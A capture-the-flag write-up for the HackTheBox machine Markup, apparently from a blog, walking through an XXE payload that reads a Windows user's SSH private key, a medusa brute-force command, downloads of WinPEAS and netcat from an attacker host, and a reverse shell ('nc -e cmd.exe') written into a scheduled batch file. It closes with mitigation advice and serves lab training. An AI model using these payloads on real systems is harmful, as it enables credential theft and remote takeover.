EvolevBoard

Contact us

HackTheBox: Markup Writeup

admin Avatar
admin

Overview

Markup is a Windows-based HackTheBox machine that involves web application exploitation through XXE (XML External Entity) injection, SSH key extraction, and privilege escalation via file injection. This writeup details the complete penetration testing methodology.

Reconnaissance

Port Scanning

Initial reconnaissance begins with a comprehensive port scan:

nmap -sV -sC -p- <HTB_IP>

Open Ports:

  • 22/tcp – OpenSSH for Windows 8.1
  • 80/tcp – Apache httpd 2.4.41 (Win64) with PHP 7.2.28
  • 443/tcp – Apache httpd 2.4.41 (Win64) with SSL

The web server is running Apache on Windows with PHP support. The site title is “MegaShopping”, suggesting an e-commerce application.

Web Application Enumeration

Browsing to http://<HTB_IP> reveals a shopping website. We need to identify authentication mechanisms and input points that might be vulnerable to injection attacks.

Initial Access

Authentication Bypass / Brute Force

The application requires authentication. We can attempt to brute force credentials using tools like medusa:

medusa -h <HTB_IP> -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/login

After identifying valid credentials or finding a vulnerable endpoint, we proceed to explore the application’s functionality.

XXE (XML External Entity) Injection

The application appears to process XML data, likely for order processing. We discover an XXE vulnerability that allows us to read local files.

XXE Payload:

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/users/daniel/.ssh/id_rsa'>]>
<order>
<quantity>
3
</quantity>
<item>
&test;
</item>
<address>
17th Estate, CA
</address>
</order>

Key Components:

  • Entity Declaration: <!ENTITY test SYSTEM 'file:///c:/users/daniel/.ssh/id_rsa'>
  • Entity Reference: &test; (used in the item field)

This XXE payload reads the SSH private key from C:\Users\daniel\.ssh\id_rsa.

Alternative XXE Examples

For reading other files, we can modify the file path:

<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/windows/win.ini'>]>

The entity is then referenced with &test; in the XML document.

SSH Access

After extracting Daniel’s SSH private key, we save it to a file and set proper permissions:

chmod 600 id_rsa
ssh -i id_rsa daniel@<HTB_IP>

We now have user-level access to the system.

Privilege Escalation

Enumeration with WinPEAS

Once on the system, we download and run WinPEAS to identify privilege escalation vectors:

# Download WinPEAS
wget <Attacker_ip>/winpeas.exe -outfile winpeas.exe
.\winpeas.exe

File Injection Vulnerability

WinPEAS reveals interesting file permissions. We check the permissions on C:\Log-Management\job.bat:

icacls C:\Log-Management\job.bat

The output shows that both admin and daniel have write permissions on this file. This is a scheduled task or batch file that runs with elevated privileges.

Exploiting File Injection

Since we can write to job.bat and it likely runs as a scheduled task with higher privileges, we inject a reverse shell payload:

  1. Download netcat (if not already present):wget <Attacker_ip>/nc.exe -outfile C:\Log-Management\nc.exe
  2. Modify job.bat with a reverse shell:echo C:\Log-Management\nc.exe -e cmd.exe <Attacker_ip> 4444 > C:\Log-Management\job.bat
  3. Set up listener on attacker machine:nc -lvnp 4444
  4. Wait for scheduled task execution or trigger it if possible.

Alternatively, we can write a more sophisticated reverse shell directly into the batch file.

Root Access

Once the scheduled task executes, we receive a reverse shell with administrator privileges. We can then retrieve the root flag:

type C:\Users\Administrator\Desktop\root.txt

Key Takeaways

  1. XXE Vulnerabilities: XML External Entity injection can be used to read local files, perform SSRF, or cause denial of service. Always validate and sanitize XML input.
  2. SSH Key Extraction: Private keys stored in predictable locations can be extracted through file read vulnerabilities.
  3. File Injection: Writeable files that are executed by scheduled tasks or services with elevated privileges present a significant security risk.
  4. Permission Auditing: Regularly audit file and directory permissions, especially for files that are executed automatically.

Mitigation Recommendations

  • Disable XML external entity processing in XML parsers
  • Implement proper input validation and sanitization for XML input
  • Use secure file permissions and avoid storing sensitive keys in predictable locations
  • Implement least privilege for scheduled tasks and services
  • Regularly audit and review scheduled tasks and their associated files
  • Use application whitelisting to prevent execution of unauthorized binaries

Leave a Reply

Your email address will not be published. Required fields are marked *